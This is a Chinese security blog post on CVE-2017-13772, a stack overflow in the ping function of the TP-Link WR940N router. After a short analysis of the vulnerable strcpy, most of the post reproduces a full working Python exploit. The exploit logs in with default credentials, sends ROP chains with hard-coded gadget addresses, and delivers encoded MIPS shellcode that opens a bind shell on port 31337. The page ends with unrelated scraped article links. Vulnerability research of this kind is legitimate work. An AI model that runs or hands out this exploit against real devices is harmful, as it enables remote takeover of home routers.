前言

本文由 本人 首发于 先知安全技术社区: https://xianzhi.aliyun.com/forum/user/5274

这个是最近爆出来的漏洞,漏洞编号:CVE-2017-13772

固件链接:http://static.tp-link.com/TL-WR940N(US)_V4_160617_1476690524248q.zip

之前使用 firmadyn 可以正常模拟运行,但是调试不了,就没有仔细看这个漏洞。今天突然想起 他会启动一个 ssh 服务,那我们是不是就可以通过ssh 连上去进行调试,正想试试,又不能正常模拟了。。。。。下面看具体漏洞。

正文

漏洞位与 管理员用来 ping 的功能,程序在获取ip 地址时没有验证长度,然后复制到栈上,造成栈溢出。搜索关键字符串 ping_addr 定位到函数 sub_453C50

获取 ip 地址后,把字符串指针放到 $s6寄存器,跟下去看看。

传入了ipAddrDispose函数,继续分析之:

先调用了 memset  初始化缓冲区,然后调用 strcpyip 地址复制到栈上,溢出。

利用的话和前文是一样的,经典的栈溢出,经典的 rop。

一步一步pwn路由器之rop技术实战

一步一步pwn路由器之路由器环境修复&&rop技术分析

附上参考链接里的 exp

#!/usr/bin/python

# -*- coding: UTF-8 -*-

import urllib2

import base64

import hashlib

from optparse import *

import sys

import urllib

banner = (

"___________________________________________________________________________\n"

"WR940N Authenticated Remote Code Exploit\n"

"This exploit will open a bind shell on the remote target\n"

"The port is 31337, you can change that in the code if you wish\n"

"This exploit requires authentication, if you know the creds, then\n"

"use the -u -p options, otherwise default is admin:admin\n"

"___________________________________________________________________________"

)

def login(ip, user, pwd):

	print "[+] Attempting to login to http://%s %s:%s"%(ip,user,pwd)

	#### Generate the auth cookie of the form b64enc('admin:' + md5('admin'))

	hash = hashlib.md5()

	hash.update(pwd)

	auth_string = "%s:%s" %(user, hash.hexdigest())

	encoded_string = base64.b64encode(auth_string)

	print "[+] Encoded authorisation: %s" %encoded_string#### Send the request

	url = "http://" + ip + "/userRpm/LoginRpm.htm?Save=Save"

	print "[+] sending login to " + url

	req = urllib2.Request(url)

	req.add_header('Cookie', 'Authorization=Basic %s' %encoded_string)

	resp = urllib2.urlopen(req)

	#### The server generates a random path for further requests, grab that here

	data = resp.read()

	next_url = "http://%s/%s/userRpm/" %(ip, data.split("/")[3])

	print "[+] Got random path for next stage, url is now %s" %next_url

	return (next_url, encoded_string)

#custom bind shell shellcode with very simple xor encoder

#followed by a sleep syscall to flush cash before running

#bad chars = 0x20, 0x00

shellcode = (

#encoder

"\x22\x51\x44\x44\x3c\x11\x99\x99\x36\x31\x99\x99"

"\x27\xb2\x05\x4b" #0x27b2059f for first_exploit

"\x22\x52\xfc\xa0\x8e\x4a\xfe\xf9"

"\x02\x2a\x18\x26\xae\x43\xfe\xf9\x8e\x4a\xff\x41"

"\x02\x2a\x18\x26\xae\x43\xff\x41\x8e\x4a\xff\x5d"

"\x02\x2a\x18\x26\xae\x43\xff\x5d\x8e\x4a\xff\x71"

"\x02\x2a\x18\x26\xae\x43\xff\x71\x8e\x4a\xff\x8d"

"\x02\x2a\x18\x26\xae\x43\xff\x8d\x8e\x4a\xff\x99"

"\x02\x2a\x18\x26\xae\x43\xff\x99\x8e\x4a\xff\xa5"

"\x02\x2a\x18\x26\xae\x43\xff\xa5\x8e\x4a\xff\xad"

"\x02\x2a\x18\x26\xae\x43\xff\xad\x8e\x4a\xff\xb9"

"\x02\x2a\x18\x26\xae\x43\xff\xb9\x8e\x4a\xff\xc1"

"\x02\x2a\x18\x26\xae\x43\xff\xc1"

#sleep

"\x24\x12\xff\xff\x24\x02\x10\x46\x24\x0f\x03\x08"

"\x21\xef\xfc\xfc\xaf\xaf\xfb\xfe\xaf\xaf\xfb\xfa"

"\x27\xa4\xfb\xfa\x01\x01\x01\x0c\x21\x8c\x11\x5c"

################ encoded shellcode ###############

"\x27\xbd\xff\xe0\x24\x0e\xff\xfd\x98\x59\xb9\xbe\x01\xc0\x28\x27\x28\x06"

"\xff\xff\x24\x02\x10\x57\x01\x01\x01\x0c\x23\x39\x44\x44\x30\x50\xff\xff"

"\x24\x0e\xff\xef\x01\xc0\x70\x27\x24\x0d"

"\x7a\x69"            #<————————- PORT 0x7a69 (31337)

"\x24\x0f\xfd\xff\x01\xe0\x78\x27\x01\xcf\x78\x04\x01\xaf\x68\x25\xaf\xad"

"\xff\xe0\xaf\xa0\xff\xe4\xaf\xa0\xff\xe8\xaf\xa0\xff\xec\x9b\x89\xb9\xbc"

"\x24\x0e\xff\xef\x01\xc0\x30\x27\x23\xa5\xff\xe0\x24\x02\x10\x49\x01\x01"

"\x01\x0c\x24\x0f\x73\x50"

"\x9b\x89\xb9\xbc\x24\x05\x01\x01\x24\x02\x10\x4e\x01\x01\x01\x0c\x24\x0f"

"\x73\x50\x9b\x89\xb9\xbc\x28\x05\xff\xff\x28\x06\xff\xff\x24\x02\x10\x48"

"\x01\x01\x01\x0c\x24\x0f\x73\x50\x30\x50\xff\xff\x9b\x89\xb9\xbc\x24\x0f"

"\xff\xfd\x01\xe0\x28\x27\xbd\x9b\x96\x46\x01\x01\x01\x0c\x24\x0f\x73\x50"

"\x9b\x89\xb9\xbc\x28\x05\x01\x01\xbd\x9b\x96\x46\x01\x01\x01\x0c\x24\x0f"

"\x73\x50\x9b\x89\xb9\xbc\x28\x05\xff\xff\xbd\x9b\x96\x46\x01\x01\x01\x0c"

"\x3c\x0f\x2f\x2f\x35\xef\x62\x69\xaf\xaf\xff\xec\x3c\x0e\x6e\x2f\x35\xce"

"\x73\x68\xaf\xae\xff\xf0\xaf\xa0\xff\xf4\x27\xa4\xff\xec\xaf\xa4\xff\xf8"

"\xaf\xa0\xff\xfc\x27\xa5\xff\xf8\x24\x02\x0f\xab\x01\x01\x01\x0c\x24\x02"

"\x10\x46\x24\x0f\x03\x68\x21\xef\xfc\xfc\xaf\xaf\xfb\xfe\xaf\xaf\xfb\xfa"

"\x27\xa4\xfb\xfe\x01\x01\x01\x0c\x21\x8c\x11\x5c"

)

###### useful gadgets #######

nop = "\x22\x51\x44\x44"

gadg_1 = "\x2A\xB3\x7C\x60"  # set $a0 = 1, and jmp $s1

gadg_2 = "\x2A\xB1\x78\x40"

sleep_addr = "\x2a\xb3\x50\x90"

stack_gadg = "\x2A\xAF\x84\xC0"

call_code = "\x2A\xB2\xDC\xF0"

def first_exploit(url, auth):

	#          trash $s1        $ra

	rop = "A"*164 + gadg_2  + gadg_1 + "B"*0x20 + sleep_addr + "C"*4

	rop += "C"*0x1c + call_code + "D"*4 + stack_gadg + nop*0x20 + shellcode

	params = {'ping_addr': rop, 'doType': 'ping', 'isNew': 'new', 'sendNum': '20', 'pSize': '64', 'overTime': '800', 'trHops': '20'}

	new_url = url + "PingIframeRpm.htm?" + urllib.urlencode(params)

	print "[+] sending exploit…"

	print "[+] Wait a couple of seconds before connecting"

	print "[+] When you are finished do http -r to reset the http service"

	req = urllib2.Request(new_url)

	req.add_header('Cookie', 'Authorization=Basic %s' %auth)

	req.add_header('Referer', url + "DiagnosticRpm.htm")

	resp = urllib2.urlopen(req)

def second_exploit(url, auth):

	url = url + "WanStaticIpV6CfgRpm.htm?"

	#                 trash      s0      s1      s2       s3     s4      ret     shellcode

	payload = "A"*111 + "B"*4 + gadg_2 + "D"*4 + "E"*4 + "F"*4 + gadg_1 + "a"*0x1c

	payload += "A"*4 + sleep_addr + "C"*0x20 + call_code + "E"*4

	payload += stack_gadg + "A"*4 +  nop*10 + shellcode + "B"*7

	print len(payload)

	params = {'ipv6Enable': 'on', 'wantype': '2', 'ipType': '2', 'mtu': '1480', 'dnsType': '1',

	'dnsserver2': payload, 'ipAssignType': '0', 'ipStart': '1000',

	'ipEnd': '2000', 'time': '86400', 'ipPrefixType': '0', 'staticPrefix': 'AAAA',

	'staticPrefixLength': '64', 'Save': 'Save', 'RenewIp': '1'}

	new_url = url + urllib.urlencode(params)

	print "[+] sending exploit…"

	print "[+] Wait a couple of seconds before connecting"

	print "[+] When you are finished do http -r to reset the http service"

	req = urllib2.Request(new_url)

	req.add_header('Cookie', 'Authorization=Basic %s' %auth)

	req.add_header('Referer', url + "WanStaticIpV6CfgRpm.htm")

	resp = urllib2.urlopen(req)

if __name__ == '__main__':

	print banner

	username = "admin"

	password = "admin"

	(next_url, encoded_string) = login("192.168.0.1", username, password)

	###### Both exploits result in the same bind shell ######

	#first_exploit(data[0], data[1])

	first_exploit(next_url, encoded_string)

参考链接:

https://www.fidusinfosec.com/tp-link-remote-code-execution-cve-2017-13772/

一步一步pwn路由器之wr940栈溢出漏洞分析与利用的更多相关文章

  1. 一步一步pwn路由器之rop技术实战

    前言 本文由 本人 首发于 先知安全技术社区: https://xianzhi.aliyun.com/forum/user/5274 这次程序也是 DVRF 里面的,他的路径是 pwnable/She ...

  2. 一步一步pwn路由器之环境搭建

    前言 本文由 本人 首发于 先知安全技术社区: https://xianzhi.aliyun.com/forum/user/5274 正式进入路由器的世界了.感觉路由器这块就是固件提取,运行环境修复比 ...

  3. 一步一步pwn路由器之uClibc中malloc&&free分析

    前言 本文由 本人 首发于 先知安全技术社区: https://xianzhi.aliyun.com/forum/user/5274 栈溢出告一段落.本文介绍下 uClibc 中的 malloc 和 ...

  4. 一步一步pwn路由器之radare2使用全解

    前言 本文由 本人 首发于 先知安全技术社区: https://xianzhi.aliyun.com/forum/user/5274 radare2 最近越来越流行,已经进入 github 前 25了 ...

  5. 一步一步pwn路由器之radare2使用实战

    前言 本文由 本人 首发于 先知安全技术社区: https://xianzhi.aliyun.com/forum/user/5274 前文讲了一些 radare2 的特性相关的操作方法.本文以一个 c ...

  6. 一步一步pwn路由器之路由器环境修复&&rop技术分析

    前言 本文由 本人 首发于 先知安全技术社区: https://xianzhi.aliyun.com/forum/user/5274 拿到路由器的固件后,第一时间肯定是去运行目标程序,一般是web服务 ...

  7. 一步一步pwn路由器之栈溢出实战

    前言 本文由 本人 首发于 先知安全技术社区: https://xianzhi.aliyun.com/forum/user/5274 本文以 DVRF 中的第一个漏洞程序 stack_bof_01 为 ...

  8. 简单实例一步一步帮你搞清楚MVC3中的路由以及区域

    我们都知道MVC 3 程序的所有请求都是先经过路由解析然后分配到特定的Controller 以及 Action 中的,为什么这些知识讲完了Controller Action Model 后再讲呢?这个 ...

  9. 【计算机网络】一步一步学习IP路由流程

    TCP/IP协议簇是目前互联网应用最广的协议栈,谈到TCP/IP协议栈就不能不讲一讲IP路由的问题,因为在我们使用的网络通信中几乎每时每刻都在发生着IP路由的事件…….当你在网络世界中还是一位新手的时 ...

随机推荐

  1. mysql 1366错误

  2. 用BERT做语义相似度匹配任务:计算相似度的方式

    1. 自然地使用[CLS] 2. cosine similairity 3. 长短文本的区别 4. sentence/word embedding 5. siamese network 方式 1. 自 ...

  3. nginx check健康检查

    nginx利用第三方模块nginx_upstream_check_module来检查后端服务器的健康情况 大家都知道,前段nginx做反代,如果后端服务器宕掉的话,nginx是不能把这台realser ...

  4. 一个后端开发者的前端语言基础:JavaScript

    JavaScript (一) 基本概述 (1) 概述 JavaScript一种直译式脚本语言,是一种动态类型.弱类型.基于原型的语言,内置支持类型.它的解释器被称为JavaScript引擎,为浏览器的 ...

  5. [转帖]使用TOAD优化复杂SQL

    独家秘笈!看下如何一键优化Oracle数据库复杂sql,DBA必备 https://www.toutiao.com/i6741208493644055053/ 原来toad 还有这种功能 感觉类似于 ...

  6. Feign【token传递】

    使用feign调用服务的时候,存在一个问题,比如当前服务调用A服务,在请求头中包含了某些特殊的字段信息,比如当前操作人的token信息,调用A的时候可以正常拿到token,然而在去调用B服务的时候,可 ...

  7. 模块 json 和 pickle

    目录 序列化 json 和 pickle 模块 序列化 序列:字符串 序列化:将其它数据类型转换成字符串的过程. 反序列化:字符串转成其它数据类型. 序列化的目的 1:以某种存储形式使用自定义对象持久 ...

  8. go map的定义和使用 键值对存储

    定义map    var m map[string]int //定义map 初始化map    m = make(map[string]int) //初始化map 修改map中ok 的值  m[&qu ...

  9. go 常量2

    数值常量 数值常量是高精度的 _值_. 一个未指定类型的常量由上下文来决定其类型. 也尝试一下输出 needInt(Big) 吧. package main import "fmt" ...

  10. S03_CH05_AXI_DMA_HDMI图像输出

    S03_CH05_AXI_DMA_HDMI图像输出 5.1概述 本课程是在前面课程基础上添加HDMI IP 实现HDMI视频图像的输出.本课程出了多了HDMI输出接口,其他内容和<S03_CH0 ...